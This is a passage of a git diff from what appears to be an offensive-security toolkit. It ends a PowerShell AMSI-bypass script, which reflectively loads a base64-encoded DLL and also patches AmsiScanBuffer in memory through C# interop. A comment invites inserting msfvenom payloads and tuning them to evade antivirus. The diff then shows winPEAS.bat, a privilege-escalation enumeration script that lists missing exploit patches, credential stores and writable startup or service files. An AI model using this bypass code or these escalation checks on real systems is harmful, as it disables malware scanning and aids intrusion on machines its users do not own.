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")) | Out-Null + Write-Output "DLL has been reflected"; + } + [Bypass.AMSI]::Disable() + + # + # You can put malicious powershell here to execute-it when Bypass-AMSI function is triggered + # -> in case of msfvenom usage : use psh-net as format + # -> customize the PowerShell code in order to bypass A.V detection (or use other tools such like unicorn) +} + +###################################################################################################################################### +[**] update 08/01/2019 from rasta-mouse's AmsiScanBufferBypass project (https://rastamouse.me/2018/12/amsiscanbuffer-bypass-part-4/): +###################################################################################################################################### +$Ref = ( +"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", +"System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" +) + +$Source = @" +using System; +using System.Runtime.InteropServices; + +namespace Bypass +{ + public class AMSI + { + [DllImport("kernel32")] + public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); + [DllImport("kernel32")] + public static extern IntPtr LoadLibrary(string name); + [DllImport("kernel32")] + public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); + + [DllImport("Kernel32.dll", EntryPoint = "RtlMoveMemory", SetLastError = false)] + static extern void MoveMemory(IntPtr dest, IntPtr src, int size); + + public static int Disable() + { + IntPtr TargetDLL = LoadLibrary("amsi.dll"); + if (TargetDLL == IntPtr.Zero) { return 1; } + + IntPtr ASBPtr = GetProcAddress(TargetDLL, "Amsi" + "Scan" + "Buffer"); + if (ASBPtr == IntPtr.Zero) { return 1; } + + UIntPtr dwSize = (UIntPtr)5; + uint Zero = 0; + + if (!VirtualProtect(ASBPtr, dwSize, 0x40, out Zero)) { return 1; } + + Byte[] Patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; + IntPtr unmanagedPointer = Marshal.AllocHGlobal(6); + Marshal.Copy(Patch, 0, unmanagedPointer, 6); + MoveMemory(ASBPtr, unmanagedPointer, 6); + + return 0; + } + } +} +"@ + +Add-Type -ReferencedAssemblies $Ref -TypeDefinition $Source -Language CSharp + +[+] Usage: +PS C:\Users\jmbourbon\Desktop\R&D> . .\amsi-bypass.ps1 +PS C:\Users\jmbourbon\Desktop\R&D> [Bypass.AMSI]::Disable() +0 + +PS C:\Users\jmbourbon\Desktop\R&D> "AmsiScanBuffer" +AmsiScanBuffer + +#> diff --git a/win/winPEAS.bat b/win/winPEAS.bat index 31db1d3..230fb11 100644 --- a/win/winPEAS.bat +++ b/win/winPEAS.bat @@ -1,654 +1,654 @@ -@ECHO OFF & SETLOCAL EnableDelayedExpansion -TITLE WinPEAS - Windows local Privilege Escalation Awesome Script -COLOR 0F -CALL :SetOnce - -REM :: WinPEAS - Windows local Privilege Escalation Awesome Script -REM :: Code by carlospolop; Re-Write by ThisLimn0 - -REM Registry scan of other drives besides -REM /////true or false -SET long=false - -:Splash -ECHO. -CALL :ColorLine " %E%32m((,.,/((((((((((((((((((((/, */%E%97m" -CALL :ColorLine " %E%32m,/*,..*(((((((((((((((((((((((((((((((((,%E%97m" -CALL :ColorLine " %E%32m,*/((((((((((((((((((/, %E%92m.*//((//**,%E%32m .*((((((*%E%97m" -CALL :ColorLine " %E%32m((((((((((((((((* %E%94m*****%E%32m,,,/########## %E%32m.(* ,((((((%E%97m" -CALL :ColorLine " %E%32m(((((((((((/* %E%94m******************%E%32m/####### %E%32m.(. ((((((%E%97m" -CALL :ColorLine " %E%32m((((((.%E%92m.%E%94m******************%E%97m/@@@@@/%E%94m***%E%92m/######%E%32m /((((((%E%97m" -CALL :ColorLine " %E%32m,,.%E%92m.%E%94m**********************%E%97m@@@@@@@@@@(%E%94m***%E%92m,####%E%32m ../(((((%E%97m" -CALL :ColorLine " %E%32m, ,%E%92m%E%94m**********************%E%97m#@@@@@#@@@@%E%94m*********%E%92m##%E%32m((/ /((((%E%97m" -CALL :ColorLine " %E%32m..((%E%92m(##########%E%94m*********%E%97m/#@@@@@@@@@/%E%94m*************%E%32m,,..((((%E%97m" -CALL :ColorLine " %E%32m.((%E%92m(################(/%E%94m******%E%97m/@@@@@#%E%94m****************%E%32m.. /((%E%97m" -CALL :ColorLine " %E%32m.(%E%92m(########################(/%E%94m************************%E%32m..*(%E%97m" -CALL :ColorLine " %E%32m.(%E%92m(#############################(/%E%94m********************%E%32m.,(%E%97m" -CALL :ColorLine " %E%32m.(%E%92m(##################################(/%E%94m***************%E%32m..(%E%97m" -CALL :ColorLine " %E%32m.(%E%92m(######################################(%E%94m************%E%32m..(%E%97m" -CALL :ColorLine " %E%32m.(%E%92m(######(,.***.,(###################(..***(/%E%94m*********%E%32m..(%E%97m" -CALL :ColorLine " %E%32m.(%E%92m(######*(#####((##################((######/(%E%94m********%E%32m..(%E%97m" -CALL :ColorLine " %E%32m.(%E%92m(##################(/**********(################(%E%94m**%E%32m...(%E%97m" -CALL :ColorLine " %E%32m.((%E%92m(####################/*******(###################%E%32m.((((%E%97m" -CALL :ColorLine " %E%32m.((((%E%92m(############################################/%E%32m /((%E%97m" -CALL :ColorLine " %E%32m..((((%E%92m(#########################################(%E%32m..(((((.%E%97m" -CALL :ColorLine " %E%32m....((((%E%92m(#####################################(%E%32m .((((((.%E%97m" -CALL :ColorLine " %E%32m......((((%E%92m(#################################(%E%32m .(((((((.%E%97m" -CALL :ColorLine " %E%32m(((((((((. ,%E%92m(############################(%E%32m../(((((((((.%E%97m" -CALL :ColorLine " %E%32m(((((((((/, %E%92m,####################(%E%32m/..((((((((((.%E%97m" -CALL :ColorLine " %E%32m(((((((((/,. %E%92m,*//////*,.%E%32m ./(((((((((((.%E%97m" -CALL :ColorLine " %E%32m(((((((((((((((((((((((((((/%E%97m" -ECHO. by carlospolop -ECHO. -ECHO. - -:Advisory -REM // Increase progress in title by n percent -CALL :T_Progress 0 -ECHO./^^!\ Advisory: WinPEAS - Windows local Privilege Escalation Awesome Script -CALL :ColorLine " %E%41mWinPEAS should be used for authorized penetration testing and/or educational purposes only.%E%40;97m" -CALL :ColorLine " %E%41mAny misuse of this software will not be the responsibility of the author or of any other collaborator.%E%40;97m" -CALL :ColorLine " %E%41mUse it at your own networks and/or with the network owner's permission.%E%40;97m" -ECHO. - -:SystemInfo -CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO -CALL :ColorLine " %E%33m[+]%E%97m WINDOWS OS" -ECHO. [i] Check for vulnerabilities for the OS version with the applied patches -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits -systeminfo -ECHO. -CALL :T_Progress 2 - -:ListHotFixes -wmic qfe get Caption,Description,HotFixID,InstalledOn | more -set expl=no -for /f "tokens=3-9" %%a in ('systeminfo') do (ECHO."%%a %%b %%c %%d %%e %%f %%g" | findstr /i "2000 XP 2003 2008 vista" && set expl=yes) & (ECHO."%%a %%b %%c %%d %%e %%f %%g" | findstr /i /C:"windows 7" && set expl=yes) -IF "%expl%" == "yes" ECHO. [i] Possible exploits (https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat) -IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2592799" 1>NUL -IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS11-080 patch is NOT installed! (Vulns: XP/SP3,2K3/SP3-afd.sys) -IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3143141" 1>NUL -IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS16-032 patch is NOT installed! (Vulns: 2K8/SP1/2,Vista/SP2,7/SP1-secondary logon) -IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2393802" 1>NUL -IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS11-011 patch is NOT installed! (Vulns: XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP1/2,7/SP0-WmiTraceMessageVa) -IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB982799" 1>NUL -IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-59 patch is NOT installed! (Vulns: 2K8,Vista,7/SP0-Chimichurri) -IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB979683" 1>NUL -IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-21 patch is NOT installed! (Vulns: 2K/SP4,XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP0/1/2,7/SP0-Win Kernel) -IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2305420" 1>NUL -IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-092 patch is NOT installed! (Vulns: 2K8/SP0/1/2,Vista/SP1/2,7/SP0-Task Sched) -IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB981957" 1>NUL -IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-073 patch is NOT installed! (Vulns: XP/SP2/3,2K3/SP2/2K8/SP2,Vista/SP1/2,7/SP0-Keyboard Layout) -IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB4013081" 1>NUL -IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS17-017 patch is NOT installed! (Vulns: 2K8/SP2,Vista/SP2,7/SP1-Registry Hive Loading) -IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB977165" 1>NUL -IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-015 patch is NOT installed! (Vulns: 2K,XP,2K3,2K8,Vista,7-User Mode to Ring) -IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB941693" 1>NUL -IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS08-025 patch is NOT installed! (Vulns: 2K/SP4,XP/SP2,2K3/SP1/2,2K8/SP0,Vista/SP0/1-win32k.sys) -IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB920958" 1>NUL -IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS06-049 patch is NOT installed! (Vulns: 2K/SP4-ZwQuerySysInfo) -IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB914389" 1>NUL -IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS06-030 patch is NOT installed! (Vulns: 2K,XP/SP2-Mrxsmb.sys) -IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB908523" 1>NUL -IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS05-055 patch is NOT installed! (Vulns: 2K/SP4-APC Data-Free) -IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB890859" 1>NUL -IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS05-018 patch is NOT installed! (Vulns: 2K/SP3/4,XP/SP1/2-CSRSS) -IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB842526" 1>NUL -IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS04-019 patch is NOT installed! (Vulns: 2K/SP2/3/4-Utility Manager) -IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB835732" 1>NUL -IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS04-011 patch is NOT installed! (Vulns: 2K/SP2/3/4,XP/SP0/1-LSASS service BoF) -IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB841872" 1>NUL -IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS04-020 patch is NOT installed! (Vulns: 2K/SP4-POSIX) -IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2975684" 1>NUL -IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS14-040 patch is NOT installed! (Vulns: 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-afd.sys Dangling Pointer) -IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3136041" 1>NUL -IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS16-016 patch is NOT installed! (Vulns: 2K8/SP1/2,Vista/SP2,7/SP1-WebDAV to Address) -IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3057191" 1>NUL -IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS15-051 patch is NOT installed! (Vulns: 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-win32k.sys) -IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2989935" 1>NUL -IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS14-070 patch is NOT installed! (Vulns: 2K3/SP2-TCP/IP) -IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2778930" 1>NUL -IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS13-005 patch is NOT installed! (Vulns: Vista,7,8,2008,2008R2,2012,RT-hwnd_broadcast) -IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2850851" 1>NUL -IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS13-053 patch is NOT installed! (Vulns: 7SP0/SP1_x86-schlamperei) -IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2870008" 1>NUL -IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS13-081 patch is NOT installed! (Vulns: 7SP0/SP1_x86-track_popup_menu) -ECHO. -CALL :T_Progress 2 - -:DateAndTime -CALL :ColorLine " %E%33m[+]%E%97m DATE and TIME" -ECHO. [i] You may need to adjust your local date/time to exploit some vulnerability -date /T -time /T -ECHO. -CALL :T_Progress 2 - -:AuditSettings -CALL :ColorLine " %E%33m[+]%E%97m Audit Settings" -ECHO. [i] Check what is being logged -REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit 2>nul -ECHO. -CALL :T_Progress 1 - -:WEFSettings -CALL :ColorLine " %E%33m[+]%E%97m WEF Settings" -ECHO. [i] Check where are being sent the logs -REG QUERY HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager 2>nul -ECHO. -CALL :T_Progress 1 - -:LAPSInstallCheck -CALL :ColorLine " %E%33m[+]%E%97m LAPS installed?" -ECHO. [i] Check what is being logged -REG QUERY "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled 2>nul -ECHO. -CALL :T_Progress 1 - -:LSAProtectionCheck -CALL :ColorLine " %E%33m[+]%E%97m LSA protection?" -ECHO. [i] Active if "1" -REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA" /v RunAsPPL 2>nul -CALL :T_Progress 1 - -:LSACredentialGuard -CALL :ColorLine " %E%33m[+]%E%97m Credential Guard?" -ECHO. [i] Active if "1" or "2" -REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA" /v LsaCfgFlags 2>nul -ECHO. -CALL :T_Progress 1 - -:LogonCredentialsPlainInMemory -CALL :ColorLine " %E%33m[+]%E%97m WDigest?" -ECHO. [i] Plain-text creds in memory if "1" -reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential 2>nul -ECHO. -CALL :T_Progress 1 - -:CachedCreds -CALL :ColorLine " %E%33m[+]%E%97m Number of cached creds" -ECHO. [i] You need System-rights to extract them -reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v CACHEDLOGONSCOUNT 2>nul -CALL :T_Progress 1 - -:UACSettings -CALL :ColorLine " %E%33m[+]%E%97m UAC Settings" -ECHO. [i] If the results read ENABLELUA REG_DWORD 0x1, part or all of the UAC components are on -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access -REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA 2>nul -ECHO. -CALL :T_Progress 1 - -:AVSettings -CALL :ColorLine " %E%33m[+]%E%97m Registered Anti-Virus(AV)" -WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | more -ECHO.Checking for defender whitelisted PATHS -reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" 2>nul -CALL :T_Progress 1 - -:PSSettings -CALL :ColorLine " %E%33m[+]%E%97m PowerShell settings" -ECHO.PowerShell v2 Version: -REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine /v PowerShellVersion 2>nul -ECHO.PowerShell v5 Version: -REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine /v PowerShellVersion 2>nul -ECHO.Transcriptions Settings: -REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription 2>nul -ECHO.Module logging settings: -REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging 2>nul -ECHO.Scriptblog logging settings: -REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging 2>nul -ECHO. -ECHO.PS default transcript history -dir %SystemDrive%\transcripts\ 2>nul -ECHO. -ECHO.Checking PS history file -dir "%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" 2>nul -ECHO. -CALL :T_Progress 3 - -:MountedDisks -CALL :ColorLine " %E%33m[+]%E%97m MOUNTED DISKS" -ECHO. [i] Maybe you find something interesting -(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul) -ECHO. -CALL :T_Progress 1 - -:Environment -CALL :ColorLine " %E%33m[+]%E%97m ENVIRONMENT" -ECHO. [i] Interesting information? -ECHO. -set -ECHO. -CALL :T_Progress 1 - -:InstalledSoftware -CALL :ColorLine " %E%33m[+]%E%97m INSTALLED SOFTWARE" -ECHO. [i] Some weird software? Check for vulnerabilities in unknow software installed -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software -ECHO. -dir /b "C:\Program Files" "C:\Program Files (x86)" | sort -reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s | findstr InstallLocation | findstr ":\\" -reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ /s | findstr InstallLocation | findstr ":\\" -IF exist C:\Windows\CCM\SCClient.exe ECHO.SCCM is installed (installers are run with SYSTEM privileges, many are vulnerable to DLL Sideloading) -ECHO. -CALL :T_Progress 2 - -:RemodeDeskCredMgr -CALL :ColorLine " %E%33m[+]%E%97m Remote Desktop Credentials Manager" -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#remote-desktop-credential-manager -IF exist "%LOCALAPPDATA%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" ECHO.Found: RDCMan.settings in %AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings, check for credentials in .rdg files -ECHO. -CALL :T_Progress 1 - -:WSUS -CALL :ColorLine " %E%33m[+]%E%97m WSUS" -ECHO. [i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit) -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus -reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\ 2>nul | findstr /i "wuserver" | findstr /i "http://" -ECHO. -CALL :T_Progress 1 - -:RunningProcesses -CALL :ColorLine " %E%33m[+]%E%97m RUNNING PROCESSES" -ECHO. [i] Something unexpected is running? Check for vulnerabilities -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes -tasklist /SVC -ECHO. -CALL :T_Progress 2 -ECHO. [i] Checking file permissions of running processes (File backdooring - maybe the same files start automatically when Administrator logs in) -for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do ( - for /f eol^=^"^ delims^=^" %%z in ('ECHO.%%x') do ( - icacls "%%z" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. - ) -) -ECHO. -ECHO. [i] Checking directory permissions of running processes (DLL injection) -for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('ECHO.%%x') do ( - icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. -) -ECHO. -CALL :T_Progress 3 - -:RunAtStartup -CALL :ColorLine " %E%33m[+]%E%97m RUN AT STARTUP" -ECHO. [i] Check if you can modify any binary that is going to be executed by admin or if you can impersonate a not found binary -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#run-at-startup -::(autorunsc.exe -m -nobanner -a * -ct /accepteula 2>nul || wmic startup get caption,command 2>nul | more & ^ -reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^ -reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^ -reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^ -reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^ -CALL :T_Progress 2 -icacls "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ -icacls "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ -icacls "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ -icacls "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ -CALL :T_Progress 2 -icacls "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ -icacls "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ -icacls "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ -icacls "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ -CALL :T_Progress 2 -schtasks /query /fo TABLE /nh | findstr /v /i "disable deshab informa") -ECHO. -CALL :T_Progress 2 - -:AlwaysInstallElevated -CALL :ColorLine " %E%33m[+]%E%97m AlwaysInstallElevated?" -ECHO. [i] If '1' then you can install a .msi file with admin privileges ;) -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated -reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul -reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul -ECHO. -CALL :T_Progress 2 - -:NetworkShares -CALL :ColorLine "%E%32m[*]%E%97m NETWORK" -CALL :ColorLine " %E%33m[+]%E%97m CURRENT SHARES" -net share -ECHO. -CALL :T_Progress 1 - -:NetworkInterfaces -CALL :ColorLine " %E%33m[+]%E%97m 